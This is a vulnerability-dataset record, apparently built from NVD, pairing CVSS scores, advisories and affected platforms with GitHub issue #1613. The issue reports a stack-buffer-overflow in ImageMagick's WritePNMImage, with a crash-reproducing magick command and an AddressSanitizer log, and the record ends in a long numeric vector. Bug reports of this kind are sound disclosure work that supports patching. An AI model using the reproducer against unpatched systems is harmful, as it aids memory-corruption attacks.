{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "[email protected]", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/29efd648f38b73a64d73f14cd2019d869a585888" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1613" }, { "source": "[email protected]", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/5c7fbf9a14fb83c9685ad69d48899f490a37609d" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1613
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a stack-buffer-overflow at coders/pnm.c:1906 in WritePNMImage. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -undercolor rgb"("67,255,32")" -compress None "(" magick:rose -solarize 1% ")" "(" magick:logo +repage ")" -size 2338x1505+3581 -print "" tmp` Here's ASAN log. ``` ================================================================= ==25473==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe4120cba0 at pc 0x7f1d07f024d8 bp 0x7ffe412080f0 sp 0x7ffe412080e8 WRITE of size 1 at 0x7ffe4120cba0 thread T0 #0 0x7f1d07f024d7 in WritePNMImage coders/pnm.c:1906:21 #1 0x7f1d0779a065 in WriteImage MagickCore/constitute.c:1159:16 #2 0x7f1d0779af8c in WriteImages MagickCore/constitute.c:1376:13 #3 0x7f1d0715e50d in CLINoImageOperator MagickWand/operation.c:4796:14 #4 0x7f1d071621cc in CLIOption MagickWand/operation.c:5258:7 #5 0x7f1d06fa3f6d in ProcessCommandOptions MagickWand/magick-cli.c:529:3 #6 0x7f1d06fa4d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #7 0x7f1d06feeba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #8 0x526f95 in MagickMain utilities/magick.c:149:10 #9 0x5268e1 in main utilities/magick.c:180:10 #10 0x7f1d01a65b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x41b069 in _start (install/bin/magick+0x41b069) Address 0x7ffe4120cba0 is located in stack of thread T0 at offset 19104 in frame #0 0x7f1d07effdaf in WritePNMImage coders/pnm.c:1522 This frame has 6 object(s): [32, 4128) 'buffer' (line 1523) [4256, 8352) 'magick' (line 1523) [8480, 12576) 'type117' (line 1675) [12704, 14752) 'pixels' (line 1736) [14880, 16928) 'pixels255' (line 1788) [17056, 19104) 'pixels381' (line 1857) <== Memory access at offset 19104 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow coders/pnm.c:1906:21 in WritePNMImage ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
stack-buffer-overflow at coders/pnm.c:1906 in WritePNMImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1613/comments
2
2019-06-21T06:23:44
2019-07-08T01:52:06Z
https://github.com/ImageMagick/ImageMagick/issues/1613
459,030,453
1,613
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : stack-buffer-overflow at coders/pnm.c:1906 in WritePNMImage Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a stack-buffer-overflow at coders/pnm.c:1906 in WritePNMImage. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -undercolor rgb"("67,255,32")" -compress None "(" magick:rose -solarize 1% ")" "(" magick:logo +repage ")" -size 2338x1505+3581 -print "" tmp` Here's ASAN log. ``` ================================================================= ==25473==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe4120cba0 at pc 0x7f1d07f024d8 bp 0x7ffe412080f0 sp 0x7ffe412080e8 WRITE of size 1 at 0x7ffe4120cba0 thread T0 #0 0x7f1d07f024d7 in WritePNMImage coders/pnm.c:1906:21 #1 0x7f1d0779a065 in WriteImage MagickCore/constitute.c:1159:16 #2 0x7f1d0779af8c in WriteImages MagickCore/constitute.c:1376:13 #3 0x7f1d0715e50d in CLINoImageOperator MagickWand/operation.c:4796:14 #4 0x7f1d071621cc in CLIOption MagickWand/operation.c:5258:7 #5 0x7f1d06fa3f6d in ProcessCommandOptions MagickWand/magick-cli.c:529:3 #6 0x7f1d06fa4d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #7 0x7f1d06feeba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #8 0x526f95 in MagickMain utilities/magick.c:149:10 #9 0x5268e1 in main utilities/magick.c:180:10 #10 0x7f1d01a65b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x41b069 in _start (install/bin/magick+0x41b069) Address 0x7ffe4120cba0 is located in stack of thread T0 at offset 19104 in frame #0 0x7f1d07effdaf in WritePNMImage coders/pnm.c:1522 This frame has 6 object(s): [32, 4128) 'buffer' (line 1523) [4256, 8352) 'magick' (line 1523) [8480, 12576) 'type117' (line 1675) [12704, 14752) 'pixels' (line 1736) [14880, 16928) 'pixels255' (line 1788) [17056, 19104) 'pixels381' (line 1857) <== Memory access at offset 19104 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow coders/pnm.c:1906:21 in WritePNMImage ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
3,389
[ -0.02877275086939335, 0.022122208029031754, -0.006196237169206142, 0.0007903041550889611, 0.042578622698783875, 0.012461882084608078, -0.015257129445672035, 0.031422872096300125, -0.0226774699985981, 0.01717531308531761, -0.0018109165830537677, -0.002613840391859412, 0.021819336339831352, 0.02086024545133114, -0.00439478550106287, 0.008669684641063213, -0.01653171144425869, 0.028974665328860283, -0.014512571506202221, -0.02622358687222004, 0.029958996921777725, -0.017389846965670586, -0.02445683814585209, 0.047197408974170685, -0.003848986467346549, 0.015736674889922142, -0.006631614174693823, 0.008928386494517326, 0.022765807807445526, 0.03228100761771202, 0.010644655674695969, 0.015484282746911049, 0.014058264903724194, 0.02978232130408287, 0.052901480346918106, 0.00827216636389494, 0.024494696408510208, 0.09762544184923172, 0.008694923482835293, 0.02041855826973915, -0.00673888111487031, -0.0596151202917099, 0.006243560928851366, 0.016367657110095024, -0.017440324649214745, -0.0027810505125671625, -0.017717957496643066, -0.025542126968503, -0.04750027880072594, 0.012480812147259712, 0.04308340698480606, -0.002615417819470167, -0.03720266371965408, -0.0637543573975563, 0.017124835401773453, -0.00968556385487318, 0.020330220460891724, 0.04066044092178345, 0.006057421211153269, -0.005101484712213278, -0.030362823978066444, 0.034325387328863144, 0.023144397884607315, 0.022816287353634834, -0.0010324432514607906, -0.012114842422306538, 0.00020585767924785614, -0.002533390186727047, -0.019497325643897057, 0.025920715183019638, -0.021806716918945312, -0.027914617210626602, 0.014929019846022129, 0.05466822534799576, 0.0051172589883208275, 0.03084236942231655, 0.051159970462322235, 0.029328014701604843, -0.041064269840717316, 0.04131666198372841, -0.0408371165394783, 0.027384592220187187, -0.05269956588745117, 0.02912610024213791, 0.013591338880360126, 0.0023172791115939617, -0.0183489378541708, -0.06526871770620346, -0.018210122361779213, -0.005524241831153631, 0.031397633254528046, 0.01574929617345333, 0.016254080459475517, -0.0017714801942929626, 0.018475135788321495, 0.02010306715965271, -0.019888533279299736, -0.02371228113770485, -0.015648338943719864, 0.010303925722837448, -0.002856768202036619, -0.0048301625065505505, 0.0037038607988506556, 0.005401200614869595, 0.015711436048150063, 0.015509522520005703, -0.011711014434695244, -0.04098854959011078, 0.013566100038588047, 0.12074460089206696, -0.0016231995541602373, -0.0243811197578907, -0.01128825731575489, -0.009250187315046787, 0.013944688253104687, 0.03795984014868736, 0.01908087730407715, 0.015989068895578384, -0.02695552445948124, -0.006041646935045719, -0.0323062464594841, -0.040004219859838486, -0.01349038165062666, 0.004063520114868879, -0.01868966780602932, 0.012638556770980358, -0.02154170349240303, -0.01684720255434513, -0.010026293806731701, -0.012064363807439804, -0.013376805000007153, -0.0305394995957613, 0.027737941592931747, -0.03086761012673378, -0.029025143012404442, -0.011900308541953564, -0.03833843022584915, 0.045001592487096786, 0.018525613471865654, 0.01400778628885746, -0.0683983787894249, -0.03442634269595146, 0.008410981856286526, 0.02799033373594284, -0.009736042469739914, 0.024570414796471596, -0.026097390800714493, -0.00647386908531189, -0.006186772603541613, -0.024305403232574463, -0.02550426684319973, -0.009900097735226154, 0.0018298460636287928, 0.010562628507614136, 0.038944169878959656, -0.011969717219471931, 0.01579977385699749, 0.025302354246377945, -0.015976449474692345, -0.008335264399647713, -0.03192765638232231, -0.029201818630099297, 0.008007153868675232, -0.03341677412390709, 0.0033505111932754517, -0.023194875568151474, -0.005697761662304401, 0.030993806198239326, 0.006890316493809223, 0.02907562255859375, 0.010070462711155415, 0.012859400361776352, 0.013704915530979633, -0.012998216785490513, -0.04197288304567337, 0.018424656242132187, 0.0018582402262836695, 0.021743617951869965, 0.008694923482835293, 0.0046314033679664135, 0.013932068832218647, -0.017314128577709198, -0.009527819231152534, -0.0004436587914824486, 0.028520358726382256, -0.01183090079575777, 0.01973709836602211, -0.02087286487221718, 0.013326326385140419, 0.005972238723188639, -0.004726050421595573, -0.037126943469047546, -0.00036202557384967804, -0.03091808781027794, 0.02406563051044941, 0.0020538445096462965, -0.036824073642492294, -0.04404250159859657, 0.009578297846019268, -0.004729205276817083, -0.010234517976641655, -0.02947944961488247, -0.041821446269750595, 0.015370706096291542, -0.011016935110092163, 0.027460310608148575, -0.038287948817014694, 0.02768746390938759, 0.027409831061959267, -0.011780422180891037, -0.025706181302666664, -0.028949426487088203, 0.01727627031505108, -0.0226774699985981, -0.03518352285027504, 0.0014449473237618804, -0.02082238532602787, 0.008183828555047512, -0.02942897193133831, -0.0049311197362840176, 0.0027479238342493773, -0.013679676689207554, -0.008038702420890331, -0.03134715557098389, -0.04444632679224014, -0.015042596496641636, -0.00895362626761198, -0.0039657182060182095, -0.04063520208001137, -0.005972238723188639, 0.022538654506206512, -0.01148386113345623, 0.0048143877647817135, 0.014398994855582714, 0.011029554530978203, 0.004120308440178633, 0.02075928822159767, 0.00861289631575346, -0.020317601040005684, 0.032104332000017166, 0.012600698508322239, 0.028596077114343643, -0.014184461906552315, -0.01578715443611145, 0.02872227318584919, 0.04280577600002289, -0.021011680364608765, -0.03379536420106888, -0.008215378038585186, 0.010915977880358696, -0.0015758760273456573, -0.012613317929208279, 0.010303925722837448, -0.016367657110095024, 0.0013802717439830303, -0.017074355855584145, 0.006369757000356913, -0.0031848785001784563, -0.022904623299837112, 0.0038237471599131823, 0.013881590217351913, 0.02439374104142189, -0.006401306018233299, 0.04018089547753334, 0.014272798784077168, -0.02407824993133545, -0.014815443195402622, -0.008575037121772766, 0.03119571879506111, 0.0027826279401779175, 0.012777373194694519, -0.04240195080637932, -0.004549375735223293, -0.047601234167814255, -0.0008281630580313504, 0.0050257667899131775, 0.026324544101953506, 0.006776739843189716, 0.0010253447107970715, -0.003341046394780278, 0.0047386703081429005, 0.002533390186727047, -0.029277537018060684, 0.031044283881783485, 0.013187510892748833, -0.020027348771691322, 0.01727627031505108, -0.029277537018060684, -0.0229803416877985, -0.02406563051044941, -0.00681459903717041, 0.04068567976355553, -0.03329057618975639, -0.007395101711153984, 0.03551163151860237, 0.011180990375578403, -0.021074777469038963, -0.006625304464250803, -0.032558638602495193, -0.0024529402144253254, -0.012468191795051098, -0.016329798847436905, -0.010392263531684875, 0.007899886928498745, -0.009565677493810654, 0.008328954689204693, -0.02045641653239727, 0.010392263531684875, -0.00030346261337399483, -0.017049117013812065, 0.03546115383505821, -0.038287948817014694, 0.001782522420398891, -0.013073934242129326, -0.0373036190867424, -0.021011680364608765, 0.021276691928505898, 0.009054582566022873, -0.009717113338410854, 0.005754549987614155, -0.032533399760723114, -0.029681364074349403, -0.017364608123898506, 0.009805451147258282, 0.012733204290270805, -0.0018519303994253278, 0.004120308440178633, 0.0596151202917099, -0.07112421840429306, 0.008316334336996078, -0.018437275663018227, -0.03046378120779991, -0.01510569453239441, -0.036748357117176056, 0.028974665328860283, -0.034300148487091064, -0.04560733586549759, 0.020620470866560936, 0.023623943328857422, 0.022854145616292953, -0.02698076330125332, 0.01682196371257305, -0.0002681670885067433, -0.045001592487096786, 0.02728363499045372, 0.00237249000929296, 0.01790725253522396, 0.01150279026478529, -0.008240616880357265, -0.01765485852956772, 0.0007812338299117982, 0.03556210920214653, 0.008240616880357265, 0.03349249064922333, 0.022690091282129288, 0.013414664193987846, -0.022387219592928886, -0.0022289417684078217, -0.011856140568852425, -0.018184883520007133, -0.010575247928500175, -0.05126092582941055, 0.012998216785490513, -0.02839416265487671, 0.00040579988854005933, 0.024974243715405464, -0.005489537958055735, -0.008877907879650593, -0.022437697276473045, -0.009187089279294014, -0.02867179363965988, 0.0733957514166832, -0.04273005947470665, 0.02079714648425579, -0.021301930770277977, -0.024557795375585556, 0.02763698436319828, 0.010095702484250069, -0.021314550191164017, 0.0127710634842515, 0.004782838746905327, 0.028066052123904228, 0.028545597568154335, -0.04739931970834732, 0.020304981619119644, 0.01114944089204073, -0.020544754341244698, 0.05986751243472099, 0.016670528799295425, -0.030034713447093964, -0.05138712376356125, 0.027914617210626602, -0.03972658887505531, -0.0503523126244545, 0.007136399392038584, 0.03801031783223152, 0.0010237672831863165, -0.017818914726376534, 0.0560816265642643, -0.04225051403045654, -0.004274898674339056, -0.012070673517882824, -0.0020648865029215813, 0.010341784916818142, 0.013237989507615566, 0.0182858407497406, 0.027763180434703827, -0.016405515372753143, 0.02122621424496174, -0.019156595692038536, 0.006366602145135403, 0.0030255557503551245, -0.05161427706480026, 0.01689768210053444, 0.03334105759859085, -0.008360503241419792, 0.0061804624274373055, 0.00716794840991497, -0.023573463782668114, 0.02400253154337406, -0.00717425812035799, -0.0047228955663740635, -0.009079822339117527, 0.03697551041841507, -0.0011192032834514976, 0.010505840182304382, -0.01366705633699894, 0.022854145616292953, -0.001585340709425509, -0.004726050421595573, -0.01764223910868168, -0.0038426765240728855, -0.0007855718140490353, 0.008196447975933552, -0.025214016437530518, -0.020696189254522324, -0.03654644265770912, -0.03841414675116539, -0.007552847266197205, 0.0036849312018603086, -0.000681459903717041, 0.03912084549665451, -0.0186518095433712, -0.03351772949099541, -0.025264494121074677, -0.03702598810195923, -0.018197502940893173, 0.003814282361418009, -0.019901152700185776, -0.01398254744708538, -0.006237250752747059, 0.020330220460891724, 0.01609002612531185, -0.02009044773876667, 0.03371964395046234, 0.007231046445667744, -0.049418460577726364, -0.007691663224250078, 0.022059109061956406, 0.020696189254522324, 0.005764015018939972, 0.015080454759299755, -0.025655703619122505, -0.026021672412753105, 0.011736253276467323, -0.0020128306932747364, 0.019497325643897057, 0.0038426765240728855, -0.001464665518142283, -0.015181411989033222, 0.027737941592931747, 0.049342744052410126, -0.00232516648247838, -0.014790203422307968, -0.021453367546200752, 0.027460310608148575, 0.004347461741417646, -0.020658330991864204, 0.026829328387975693, -0.048307932913303375, 0.0013021877966821194, -0.07258810102939606, -0.04697025567293167, 0.018942061811685562, 0.03795984014868736, -0.01043643243610859, -0.01727627031505108, 0.000693290785420686, -0.0132884681224823, 0.002173730870708823, 0.0015459044370800257, 0.022690091282129288, -0.028545597568154335, -0.04785362631082535, -0.0027857827953994274, 0.012960357591509819, -0.00846777018159628, -0.009584607556462288, 0.05052898824214935, -0.024280164390802383, 0.02048165537416935, -0.006884006783366203, 0.023851096630096436, 0.00951519887894392, 0.01396992802619934, -0.03722790256142616, -0.026778850704431534, 0.023030821233987808, -0.0215795636177063, -0.011029554530978203, 0.007117469795048237, -0.008000844158232212, 0.026122629642486572, -0.021831955760717392, 0.002394574461504817, -0.016367657110095024, 0.04235146939754486, -0.012985596433281898, 0.0343758650124073, -0.0037290998734533787, 0.005628353916108608, -0.01167946495115757, 0.028091290965676308, 0.0351078025996685, 0.03954991325736046, -0.02439374104142189, 0.030640456825494766, 0.00457461504265666, 0.024671372026205063, -0.021465986967086792, 0.02799033373594284, -0.00026777273160405457, -0.006884006783366203, 0.028848469257354736, 0.007338313385844231, -0.0011720479233190417, -0.02258913405239582, -0.010057843290269375, -0.0029529929161071777, -0.0031769913621246815, -0.004063520114868879, 0.04641498997807503, -0.028469879180192947, -0.026804089546203613, -0.03599117696285248, 0.021983390673995018, -0.027788419276475906, 0.030261866748332977, -0.00672626169398427, -0.021693140268325806, -0.02046903595328331, -0.005909140687435865, 0.023989912122488022, 0.01685982197523117, -0.0023835322353988886, -0.0017951420741155744, -0.0017083820421248674, -0.016279319301247597, 0.017452945932745934, 0.02049427479505539, 0.01757914200425148, 0.0031391324009746313, 0.013414664193987846, -0.003322117030620575, -0.009982125833630562, -0.02407824993133545, -0.0089914845302701, 0.008840049616992474, -0.05880746617913246, -0.012285207398235798, 0.03167526423931122, 0.005319172982126474, 0.0009196553728543222, -0.009786521084606647, -0.009887478314340115, 0.03445158526301384, -0.003080766648054123, -0.01115575060248375, -0.010909668169915676, -0.03634452819824219, -0.0009109793463721871, -0.011187300086021423, 0.006947104819118977, 0.016582190990447998, 0.020961200818419456, -0.01791987195611, 0.01576191559433937, 0.016607429832220078, 0.00985592883080244, -0.024217065423727036, 0.0004574615159071982, 0.010714063420891762, -0.011698395013809204, 0.0004243349831085652, -0.0091744689270854, -0.007149019278585911, 0.007571776397526264, -0.012537600472569466, 0.02086024545133114, -0.0009614579030312598, -0.022828906774520874, 0.018815865740180016, 0.000544615788385272, -0.021112637594342232, -0.018197502940893173, -0.020670950412750244, 0.02912610024213791, 0.006801979150623083, 0.009546748362481594, 0.0136544369161129, -0.009035653434693813, 0.020620470866560936, 0.02080976590514183, 0.002127984771504998, 0.028192248195409775, 0.0006439953576773405, 0.008051322773098946, 0.01790725253522396, -0.040357571095228195, -0.003213272662833333, 0.00878957100212574, -0.057293109595775604, -0.009357454255223274, 0.016039546579122543, 0.007104850374162197, 0.016998639330267906, -0.027712702751159668, -0.005868126638233662, -0.0056031146086752415, -0.01862657070159912, -0.022185305133461952, 0.04134190082550049, 0.028621315956115723, -0.005148808006197214, -0.0317005030810833, 0.004994217772036791, 0.007918816059827805, -0.010871808975934982, -0.037909362465143204, 0.0030239783227443695, -0.008373122662305832, -0.017326747998595238, -0.013944688253104687, 0.006303504109382629, -0.016317179426550865, -0.016695767641067505, 0.00898517481982708, 0.01791987195611, 0.023257974535226822, 0.01612788438796997, -0.05648545175790787, 0.0075591569766402245, 0.005183511879295111, 0.01650647260248661, -0.014146602712571621, -0.006268800236284733, 0.047904107719659805, 0.0672878548502922, -0.013742774724960327, -0.019509945064783096, -0.013174891471862793, 0.00044720806181430817, -0.02010306715965271, 0.015686197206377983, 0.049014635384082794, -0.0028252191841602325, -0.027460310608148575, -0.027384592220187187, 0.03051425889134407, 0.01645599491894245, 0.017743196338415146, -0.007571776397526264, 0.007035442627966404, 0.021049538627266884, -0.022488176822662354, -0.025769280269742012, 0.02439374104142189, 0.020002109929919243, -0.024583034217357635, 0.01870228908956051, 0.032558638602495193, -0.008057632483541965, 0.01349038165062666, 0.021768856793642044, -0.04474920034408569, 0.01764223910868168, -0.007855718024075031, -0.01723841205239296, -0.042578622698783875, -0.036420244723558426, 0.022803667932748795, -0.05017564073204994, -0.003457777900621295, 0.006183617748320103, 0.018058687448501587, -0.006884006783366203, 0.010038914158940315, -0.019875913858413696, -0.02338417060673237, -0.009603536687791348, -0.02550426684319973, 0.016355037689208984, -0.012588078156113625, -0.012878330424427986, -0.002045957138761878, 0.02617310732603073, -0.004379010759294033, 0.006618994753807783, -0.010909668169915676, 0.007918816059827805, -0.0183489378541708, 0.016695767641067505, -0.024646133184432983, 0.004281208850443363, 0.015421184711158276, -0.013868970796465874, 0.005372806452214718, -0.009540438652038574, -0.0058870562352240086, 0.0003030682564713061, -0.00913661066442728, -0.007811549585312605, -0.04235146939754486, -0.03667263686656952, -0.012316756881773472, -0.017730576917529106, -0.003738564671948552, -0.011218848638236523, 0.030337585136294365, 0.012455572374165058, 0.0008250081446021795, -0.018235361203551292, -0.01562309917062521, 0.013540860265493393, -0.002039647428318858, -0.020267121493816376, 0.0276117455214262, -0.0028094446752220392, 0.008751711808145046, 0.002083816099911928, 0.014449473470449448, -0.01396992802619934, 0.019863294437527657, -0.02482280693948269, 0.013730155304074287, -0.017528662458062172, 0.020355459302663803, -0.007319384254515171, -0.045405421406030655, 0.02011568658053875, 0.0044515738263726234, 0.004767064470797777, 0.0016626359429210424, -0.023472506552934647, -0.02048165537416935, -0.009048272855579853, 0.0050131469033658504, 0.0022273643407970667, 0.001738353748805821, -0.01276475377380848, 0.008240616880357265, 0.003300032578408718, -0.009742352180182934, -0.009073512628674507, 0.02229888178408146, 0.006543276831507683, 0.024936383590102196, -0.021024299785494804, 0.011376594193279743, 0.004208645783364773, 0.009900097735226154, -0.0002535756502766162, -0.0323062464594841, 0.007035442627966404, 0.031120002269744873, -0.050428032875061035, 0.012846780940890312, 0.03223052993416786, 0.020633092150092125, 0.04053424298763275, -0.018891582265496254, 0.01181828137487173, -0.04474920034408569, 0.06092756241559982, -0.023409409448504448, 0.0018724373076111078, -0.001760438084602356, 0.007016513030976057, -0.006073195952922106, -0.0009583029896020889, -0.007628564722836018, -0.03700074926018715, 0.04906511306762695, -0.011755183339118958, -0.015358086675405502, -0.022841526195406914, 0.013061314821243286, -0.009010414592921734, -0.0052970885299146175, -0.037177424877882004, -0.011603747494518757, 0.008114420808851719, -0.04318436607718468, -0.010310235433280468, -0.018424656242132187, -0.03843938559293747, -0.024494696408510208, 0.02872227318584919, -0.008530868217349052, 0.0276117455214262, 0.007401411421597004, 0.004530446138232946, -0.008852669037878513, 0.01976233720779419, 0.012076983228325844, -0.02517615631222725, 0.009041963145136833, -0.02445683814585209, -0.01684720255434513, 0.005937534850090742, -0.003476707497611642, -0.006852457765489817, -0.019169215112924576, -0.02542855031788349, -0.02441897988319397, -0.008347883820533752, -0.004470502957701683, 0.004196026362478733, 0.0025475872680544853, -0.002448207698762417, -0.020393317565321922, -0.022488176822662354, -0.016304558143019676, 0.027157438918948174, 0.008240616880357265, 0.011603747494518757, -0.004691346548497677, 0.003978337626904249, -0.032154809683561325, 0.038944169878959656, -0.01544642448425293, -0.012032815255224705, -0.0018945216434076428, -0.017036497592926025, 0.0013928913976997137, -0.012625937350094318, -0.03783364221453667, 0.003561889985576272, -0.0007445580558851361, -0.010322855785489082, 0.02693028561770916, 0.028621315956115723, -0.021402888000011444, 0.022892003878951073, -0.022399839013814926, 0.015938589349389076, 0.02083500474691391, -0.008581346832215786, 0.004997372627258301, -0.009887478314340115, 0.03629405051469803, -0.019888533279299736, -0.02228626236319542, -0.016594810411334038, 0.0380355566740036, 0.011111581698060036, -0.014588289894163609, -0.003416764084249735, 0.012159011326730251, -0.015383326448500156, 0.00878957100212574, -0.013553479686379433, 0.040054697543382645, -0.02512567862868309, -0.020292362198233604, -0.014777584001421928, -0.007893577218055725, -0.0014481022953987122, 0.005126723553985357, 0.023207494989037514, -0.03907036781311035, 0.0073446230962872505, 0.017301509156823158, 0.0064801787957549095, -0.00717425812035799, -0.02327059395611286, 0.0138058727607131, -0.027788419276475906, -0.022349361330270767, -0.01095383707433939, 0.018790625035762787, -0.013225370086729527, -0.03561259061098099, 